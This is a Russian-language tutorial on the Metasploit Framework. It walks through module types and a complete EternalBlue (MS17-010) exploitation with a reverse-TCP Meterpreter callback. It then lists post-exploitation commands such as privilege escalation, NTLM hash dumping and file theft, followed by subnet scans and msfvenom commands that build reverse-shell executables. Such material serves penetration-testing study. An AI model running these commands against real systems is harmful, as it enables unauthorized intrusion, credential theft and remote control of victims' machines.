Metasploit Framework — это не просто набор эксплойтов. Это целая платформа для разработки и запуска кода атаки, управления сессиями, пост-эксплуатации и документирования. Первый раз открыв msfconsole, большинство людей теряются в потоке команд. Давайте разберём структуру.

Архитектура Metasploit

Framework состоит из модулей нескольких типов:

  • Exploits — код, использующий конкретную уязвимость
  • Payloads — код, выполняемый после успешной эксплуатации (шеллы, meterpreter)
  • Auxiliaries — вспомогательные модули: сканеры, фаззеры, брутфорсеры
  • Post — модули пост-эксплуатации для уже захваченных сессий
  • Encoders — кодировщики пейлоадов для обхода AV
  • Nops — NOP-слайды для выравнивания эксплойтов

Первый запуск: msfconsole

msfconsole

Основные команды навигации:

search ms17-010 # поиск модулей use exploit/windows/smb/ms17_010_eternalblue info # информация о модуле show options # обязательные и опциональные параметры show payloads # список совместимых пейлоадов

Типичный рабочий процесс

На примере EternalBlue (MS17-010):

use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.100 set LHOST 192.168.1.50 set LPORT 4444 set PAYLOAD windows/x64/meterpreter/reverse_tcp run

После успешной эксплуатации вы попадаете в Meterpreter — интерактивную сессию на целевой машине.

Meterpreter: основные команды

Meterpreter — продвинутый агент пост-эксплуатации, работающий полностью в памяти:

sysinfo # информация о системе getuid # текущий пользователь getsystem # попытка повышения привилегий hashdump # дамп NTLM-хэшей upload file.exe /tmp/ # загрузить файл download /etc/passwd . # скачать файл shell # получить OS shell background # свернуть сессию в фон

Управление сессиями

Когда сессий несколько — переключаться между ними:

sessions -l # список активных сессий sessions -i 1 # взаимодействовать с сессией №1 sessions -k 1 # завершить сессию

Auxiliary-модули для разведки

Metasploit богат не только эксплойтами. Auxiliary-модули позволяют проводить разведку без эксплуатации:

use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.0/24 set PORTS 22,80,443,445,3389 run use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.1.0/24 run

Msfvenom: генерация пейлоадов

Отдельный инструмент для создания шеллкода и исполняемых файлов:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe

Для Linux:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf

Практический совет

Metasploit — инструмент с огромной базой модулей, но большинство из них не нужны в повседневной работе. Изучите хорошо 10-15 наиболее актуальных эксплойтов и вспомогательных модулей, научитесь правильно настраивать Meterpreter и управлять сессиями — это даст 90% практической ценности фреймворка.